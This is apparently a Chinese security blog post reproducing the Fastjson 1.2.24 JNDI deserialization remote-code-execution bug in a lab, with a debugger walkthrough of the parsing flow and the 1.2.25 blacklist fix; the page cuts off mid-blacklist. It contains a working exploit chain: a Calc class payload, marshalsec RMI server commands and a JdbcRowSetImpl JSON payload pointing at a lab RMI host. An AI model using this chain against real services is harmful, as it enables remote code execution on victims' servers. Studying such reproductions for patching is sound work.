<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">
<script>
(function(){
 if(''){
 if (prompt('请输入文章密码') !== ''){
                 alert('密码错误！');
                                 history.back();
                                             
 }
         
 }
     
 })();
</script>


  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-mac-osx.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />





  <link rel="alternate" href="/atom.xml" title="v1rus blog" type="application/atom+xml" />






<meta name="description" content="追洞计划:WEB2.0[1+1+1+1]课程之Fastjson反序列化漏洞复现目录：1、靶场搭建2、漏洞复现3、漏洞分析4、漏洞修复5、心得靶场搭建​    使用idea maven项目创建，在pom中导入fastjson的坐标。（因为本文复现1.2.24的rce，所以版本要小于1.2.24，本文采取1.2.23版本坐标）。 ​    导入之后在右边点击maven图标导入。 坑点​    其中环境">
<meta property="og:type" content="article">
<meta property="og:title" content="fastjson系列&#x2F;1.2.24&#x2F;1">
<meta property="og:url" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/index.html">
<meta property="og:site_name" content="v1rus blog">
<meta property="og:description" content="追洞计划:WEB2.0[1+1+1+1]课程之Fastjson反序列化漏洞复现目录：1、靶场搭建2、漏洞复现3、漏洞分析4、漏洞修复5、心得靶场搭建​    使用idea maven项目创建，在pom中导入fastjson的坐标。（因为本文复现1.2.24的rce，所以版本要小于1.2.24，本文采取1.2.23版本坐标）。 ​    导入之后在右边点击maven图标导入。 坑点​    其中环境">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210208165145313.png">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210208165329378.png">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210208170153049.png">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210208171402744.png">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210208172230920.png">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210208173255414.png">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209084539942.png">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209085336093.png">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209090506723.png">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209093416204.png">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209094546995.png">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209094918755.png">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209100452381.png">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209100744044.png">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209101841193.png">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209103937144.png">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209110248272.png">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209110229924.png">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209145430484.png">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209145905412.png">
<meta property="og:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210215202433496.png">
<meta property="article:published_time" content="2021-02-18T01:05:07.547Z">
<meta property="article:modified_time" content="2021-02-17T03:01:09.181Z">
<meta property="article:author" content="Virusday">
<meta property="article:tag" content="Learn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210208165145313.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://virusday.github.io/2021/02/18/fastjson系列/1.2.24/1/"/>





  <title>fastjson系列/1.2.24/1 | v1rus blog</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>
<script type="text/javascript" src="/lib/clipboard/clipboard.js"></script>
<script type="text/javascript" src="/js/src/custom.js"></script>
<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">v1rus blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">做些有意思的事</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://virusday.github.io/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Virusday">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/user.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="v1rus blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">fastjson系列/1.2.24/1</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2021-02-18T09:05:07+08:00">
                2021-02-18
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">更新于&#58;</span>
              
              <time title="更新于" itemprop="dateModified" datetime="2021-02-17T11:01:09+08:00">
                2021-02-17
              </time>
            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  2.5k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  10
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="追洞计划-WEB2-0-1-1-1-1-课程之Fastjson反序列化漏洞复现"><a href="#追洞计划-WEB2-0-1-1-1-1-课程之Fastjson反序列化漏洞复现" class="headerlink" title="追洞计划:WEB2.0[1+1+1+1]课程之Fastjson反序列化漏洞复现"></a>追洞计划:WEB2.0[1+1+1+1]课程之Fastjson反序列化漏洞复现</h1><h2 id="目录："><a href="#目录：" class="headerlink" title="目录："></a>目录：</h2><h3 id="1、靶场搭建"><a href="#1、靶场搭建" class="headerlink" title="1、靶场搭建"></a>1、靶场搭建</h3><h3 id="2、漏洞复现"><a href="#2、漏洞复现" class="headerlink" title="2、漏洞复现"></a>2、漏洞复现</h3><h3 id="3、漏洞分析"><a href="#3、漏洞分析" class="headerlink" title="3、漏洞分析"></a>3、漏洞分析</h3><h3 id="4、漏洞修复"><a href="#4、漏洞修复" class="headerlink" title="4、漏洞修复"></a>4、漏洞修复</h3><h3 id="5、心得"><a href="#5、心得" class="headerlink" title="5、心得"></a>5、心得</h3><h2 id="靶场搭建"><a href="#靶场搭建" class="headerlink" title="靶场搭建"></a>靶场搭建</h2><p>​    使用idea maven项目创建，在pom中导入fastjson的坐标。（因为本文复现1.2.24的rce，所以版本要小于1.2.24，本文采取1.2.23版本坐标）。</p>
<p>​    导入之后在右边点击maven图标导入。</p>
<h4 id="坑点"><a href="#坑点" class="headerlink" title="坑点"></a>坑点</h4><p>​    其中环境有一个非常细小的点，可以说是个大坑，我调试了很久，之前的报错如下：<br>1、rmi+jndi环境：java.sql.SQLException: JdbcRowSet (连接) JNDI 无法连接<br>2、ldap+jndi环境： java.lang.ClassCastException: javax.naming.Reference cannot be cast to javax.sql.DataSource</p>
<p>后来才发现是java的环境没有配置对，虽然都是jdk1.8，但是复现的环境采用1.8.0_102,之前的环境1.8.0_221没有复现成功。因为JDK 8u113 之后，系统属性 <code>com.sun.jndi.rmi.object.trustURLCodebase</code>、<code>com.sun.jndi.cosnaming.object.trustURLCodebase</code> 的默认值变为false，即默认不允许RMI、cosnaming从远程的Codebase加载Reference工厂类。</p>
<h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><h4 id="一、-准备被远程下载的class文件"><a href="#一、-准备被远程下载的class文件" class="headerlink" title="一、 准备被远程下载的class文件"></a>一、 准备被远程下载的class文件</h4><p>这边简单弹个计算器，也可以反弹shell</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.v1rus;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Calc</span></span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="title">Calc</span><span class="params">()</span></span>&#123;</span><br><span class="line">        <span class="keyword">try</span>&#123;</span><br><span class="line">            Runtime.getRuntime().exec(<span class="string">"calc"</span>);</span><br><span class="line">        &#125;<span class="keyword">catch</span> (Exception e)&#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span>  <span class="title">main</span><span class="params">(String[] argv)</span></span>&#123;</span><br><span class="line">        Calc c = <span class="keyword">new</span> Calc();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>命令行输入<code>javac Calc.java</code>，在当前文件夹下会生成Calc.class文件。</p>
<h4 id="二、-http服务"><a href="#二、-http服务" class="headerlink" title="二、 http服务"></a>二、 http服务</h4><p>可以简单的用python3在当前Calc.class文件的文件夹下起http服务</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -m http.server <span class="number">8088</span></span><br></pre></td></tr></table></figure>

<h4 id="三、RMI服务"><a href="#三、RMI服务" class="headerlink" title="三、RMI服务"></a>三、RMI服务</h4><p>使用marshalsec起rmi服务</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -cp marshalsec-<span class="number">0</span>.<span class="number">0</span>.<span class="number">3</span>-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://<span class="number">192</span>.<span class="number">168</span>.<span class="number">249</span>.<span class="number">156</span>:<span class="number">8088</span>/#Calc"  <span class="number">8888</span></span><br></pre></td></tr></table></figure>

<p>简而言之就是将class文件放到了http服务上，再用rmi服务绑定该class文件，并将rmi服务的端口应用在8888端口上。</p>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>​    fastjson在解析json的过程中，支持使用autoType来实例化某一个具体的类，并调用该类的set/get方法来访问属性。通过查找代码中相关的方法，即可构造出一些恶意利用链。</p>
<p>首先放上服务端使用的poc demo：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.v1rus;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.alibaba.fastjson.JSON;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Test</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> </span>&#123;</span><br><span class="line">        String v1rus = <span class="string">"&#123;\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://192.168.249.156:8888/Calc\",\"autoCommit\":\"true\"&#125;"</span>;</span><br><span class="line">        JSON.parseObject(v1rus);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="一、-熟悉fastjson工作流程"><a href="#一、-熟悉fastjson工作流程" class="headerlink" title="一、 熟悉fastjson工作流程"></a>一、 熟悉fastjson工作流程</h4><p>我们的poc中用到的类是<code>com.sun.rowset.JdbcRowSetImpl</code>，</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">Exception in thread &quot;main&quot; com.alibaba.fastjson.JSONException: set property error, autoCommit</span><br><span class="line">	at com.alibaba.fastjson.parser.deserializer.FieldDeserializer.setValue(FieldDeserializer.java:131)</span><br><span class="line">	at com.alibaba.fastjson.parser.deserializer.DefaultFieldDeserializer.parseField(DefaultFieldDeserializer.java:83)</span><br><span class="line">	at com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.parseField(JavaBeanDeserializer.java:722)</span><br><span class="line">	at com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.deserialze(JavaBeanDeserializer.java:568)</span><br><span class="line">	at com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.parseRest(JavaBeanDeserializer.java:877)</span><br><span class="line">	at com.alibaba.fastjson.parser.deserializer.FastjsonASMDeserializer_1_JdbcRowSetImpl.deserialze(Unknown Source)</span><br><span class="line">	at com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.deserialze(JavaBeanDeserializer.java:183)</span><br><span class="line">	at com.alibaba.fastjson.parser.DefaultJSONParser.parseObject(DefaultJSONParser.java:368)</span><br><span class="line">	at com.alibaba.fastjson.parser.DefaultJSONParser.parse(DefaultJSONParser.java:1327)</span><br><span class="line">	at com.alibaba.fastjson.parser.DefaultJSONParser.parse(DefaultJSONParser.java:1293)</span><br><span class="line">	at com.alibaba.fastjson.JSON.parse(JSON.java:137)</span><br><span class="line">	at com.alibaba.fastjson.JSON.parse(JSON.java:128)</span><br><span class="line">	at com.alibaba.fastjson.JSON.parseObject(JSON.java:201)</span><br><span class="line">	at com.v1rus.Test.main(Test.java:8)</span><br></pre></td></tr></table></figure>

<p>我们直接进入<code>com.alibaba.fastjson.JSON</code>这个类中，并在parseObject函数上面下断点。</p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210208165145313.png" alt="image-20210208165145313"></p>
<p>最后会跟到这个方法上。通过DefaultJSONParser类去parse我们传入的字符串</p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210208165329378.png" alt="image-20210208165329378"></p>
<p>跟进74行的parse代码。这里是根据JSONLexer的token为12到case的判断，进入关键函数。</p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210208170153049.png" alt="image-20210208170153049"></p>
<p>根据lexer.token()方法返回token的值，这里是12，所以进入else进行处理。</p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210208171402744.png" alt="image-20210208171402744"></p>
<p>然后进入while(true)循环，第一步骤就是lexer.skipWhitespace，跟进去查看方法</p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210208172230920.png" alt="image-20210208172230920"></p>
<p>因而返回的是  “  号，所以可以进入if判断，根据变量名我们也可以得知，scanSymbol这个方法返回的是key关键字。（key、value对）</p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210208173255414.png" alt="image-20210208173255414"></p>
<p>大家可以简单的跟进<code>com.alibaba.fastjson.parser.JSONLexerBase#scanSymbol</code>这个函数走一下流程，最后会通过双引号的闭合判断来返回value字符串，这边返回的就是第一个字符串<code>@type</code></p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209084539942.png" alt="image-20210209084539942"></p>
<p>继续往下走到了这里，将key和全局静态常量作比较看是否为<code>@type</code>，如果是的话，进入if判断。</p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209085336093.png" alt></p>
<p>跟进<code>com.alibaba.fastjson.util#loadClass</code>，这里面并没有做什么黑名单的过滤就讲这个类对象返回了。</p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209090506723.png" alt="image-20210209090506723"></p>
<p>上面那行代码，跟进分析</p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209093416204.png" alt="image-20210209093416204"></p>
<p>判断是类名返回</p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209094546995.png" alt="image-20210209094546995"></p>
<p>跟进方法分析返回FastJsonASMDeserializer_1_JdbcRowSetImpl</p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209094918755.png" alt="image-20210209094918755"></p>
<p>再跟进deserialze后继续往下调试，进入setDataSourceName方法，将dataSourceName值设置为目标RMI服务的地址</p>
<p>一路跟到parseField方法</p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209100452381.png" alt="image-20210209100452381"></p>
<p>调用smartMatch方法来处理我们传入的key值，跟进这个方法</p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209100744044.png" alt="image-20210209100744044"></p>
<p>之后回跟到((FieldDeserializer)fieldDeserializer).parseField(parser, object, objectType, fieldValues);这行代码，进入FieldDeserializer的parseField方法。进行一些Field的赋值操作。</p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209101841193.png" alt="image-20210209101841193"></p>
<p>再跟进<code>com.alibaba.fastjson.parser.deserializer.FieldDeserializer#setValue</code>方法，根据fieldInfo.fieldClass判断该类，最后进入箭头指向的else体，通过反射调用setAutoCommit关键方法。嘿嘿，接下来不是 为 所 欲 为。</p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209103937144.png" alt="image-20210209103937144"></p>
<p>这个jdk自带的类必须要先获得一个connection，如果没有的话先执行connect方法。我们进去看看里面有什么。</p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209110248272.png" alt="image-20210209110248272"></p>
<p>因为我们在前面通过setDataSourceName()方法设置了dataSourceName的值，所以进入esle if通过lookup方法去获取dataSource。而rmi（java远程方法调用机制）的主角就是这个方法，如果lookup里面传入的参数可控，就可以指向我们所构造的rmi服务，那么就有很大的可能被攻击。（<em>InitialContext 是一个实现了 Context接口的类。使用这个类作为JNDI命名服务的入口点。</em>）</p>
<p>这里也简单提一句JNDI和RMI关系，以便更好理解。简单来说，JNDI (Java Naming and Directory Interface) 是一组应用程序接口。JNDI底层支持RMI远程对象，RMI注册的服务可以通过JNDI接口来访问和调用。JNDI接口在初始化时，可以将RMI URL作为参数传入，而JNDI注入就出现在客户端的lookup()函数中。</p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209110229924.png" alt="image-20210209110229924"></p>
<p>用referenceWrapper包装reference类，注册在jndi的rmi服务实现上，这里rmi服务器绑定的类并没有实现相应的接口，而是通过Refernces类来绑定过一个外部的远程对象。（这里先提及一下，后面会详细说明）一路跟进到这个最终的方法，该方法执行完就会加载完远程类实现rce。可以看到这里的var3是RegistryContext类，调用lookup函数。</p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209145430484.png" alt="image-20210209145430484"></p>
<p>跟进去时候传入的这个参数是Calc也就是/后面的请求文件，不为空之后调用this.registry(RegistryImpl_Stub，stub和skel的概念是相对而言的，并不只存在于<strong>服务端和客户端</strong>之间)的lookup方法，是我们可控的，所以就造成了JNDI注入漏洞。</p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210209145905412.png" alt="image-20210209145905412"></p>
<p>继续跟进marshelsec可能会出现这样的错误:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">java.net.SocketTimeoutException: Read timed out</span><br><span class="line">        at java.net.SocketInputStream.socketRead0(Native Method)</span><br><span class="line">        at java.net.SocketInputStream.socketRead(Unknown Source)</span><br><span class="line">        at java.net.SocketInputStream.read(Unknown Source)</span><br><span class="line">        at java.net.SocketInputStream.read(Unknown Source)</span><br><span class="line">        at java.io.BufferedInputStream.fill(Unknown Source)</span><br><span class="line">        at java.io.BufferedInputStream.read(Unknown Source)</span><br><span class="line">        at java.io.FilterInputStream.read(Unknown Source)</span><br><span class="line">        at marshalsec.jndi.RMIRefServer.doMessage(RMIRefServer.java:221)</span><br><span class="line">        at marshalsec.jndi.RMIRefServer.run(RMIRefServer.java:171)</span><br><span class="line">        at marshalsec.jndi.RMIRefServer.main(RMIRefServer.java:117)</span><br></pre></td></tr></table></figure>

<p>原因是网络读取数据超时，我们跟进方法的同时加长的数据传输的时间，等待超时抛出错误。至此利用的部分已经结束。</p>
<h4 id="疑惑"><a href="#疑惑" class="headerlink" title="疑惑"></a>疑惑</h4><p>因为JNDI注入中RMI服务器最终执行远程方法，但是目标服务器lookup()一个恶意的RMI服务地址，反而是目标服务器执行了。那么究竟是什么原因？</p>
<p>在JNDI服务中，RMI服务端除了直接绑定远程对象之外，还可以通过Reference类来绑定一个<strong>外部的远程对象</strong>（当前名称目录系统之外的对象）。绑定了Reference之后，服务端会先通过Referenceable.getReference()获取绑定对象的引用，并且在目录中保存。当客户端在lookup()查找这个远程对象时，客户端会获取相应的object factory，最终通过factory类将reference转换为具体的对象实例。 </p>
<p>简而言之，在Server绑定Reference时，这个恶意对象是不在Server上的，Reference指向某个地址，Client会去这个地址取出对象并在Client实例化。</p>
<h4 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h4><p>攻击者准备rmi服务和web服务，将rmi绝对路径注入到lookup方法中，受害者JNDI接口会指向攻击者控制rmi服务器，JNDI接口向攻击者控制web服务器远程加载恶意代码，执行构造函数造成RCE。</p>
<h2 id="漏洞修复"><a href="#漏洞修复" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><p>从1.2.25开始对这个漏洞进行了修补，修补方式是会在 <strong>com.alibaba.fastjson.parser.DefaultJSONParser#parseObject</strong> 方法中调用 <strong>com.alibaba.fastjson.parser.ParserConfig#checkAutoType</strong> 来检查我们传入的类是不是在黑名单中，也就是将TypeUtils.loadClass替换为checkAutoType()函数：</p>
<p><img src="/2021/02/18/fastjson%E7%B3%BB%E5%88%97/1.2.24/1/image-20210215202433496.png" alt="image-20210215202433496"></p>
<p>只有通过了白名单的校验才会调用loadClass。</p>
<p>但是这里同时使用白名单和黑名单的方式来限制反序列化的类，只有当白名单不通过时才会进行黑名单判断，相当于白名单并没有真正起到白名单的作用。我们仍然可以进入后续的流程来进行绕过。</p>
<p>黑名单里面禁止了一些常见的反序列化漏洞利用链：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">bsh</span><br><span class="line">com.mchange</span><br><span class="line">com.sun.</span><br><span class="line">java.lang.Thread</span><br><span class="line">java.net.Socket</span><br><span class="line">java.rmi</span><br><span class="line">javax.xml</span><br><span class="line">org.apache.bcel</span><br><span class="line">org.apache.commons.beanutils</span><br><span class="line">org.apache.commons.collections.Transformer</span><br><span class="line">org.apache.commons.collections.functors</span><br><span class="line">org.apache.commons.collections4.comparators</span><br><span class="line">org.apache.commons.fileupload</span><br><span class="line">org.apache.myfaces.context.servlet</span><br><span class="line">org.apache.tomcat</span><br><span class="line">org.apache.wicket.util</span><br><span class="line">org.codehaus.groovy.runtime</span><br><span class="line">org.hibernate</span><br><span class="line">org.jboss</span><br><span 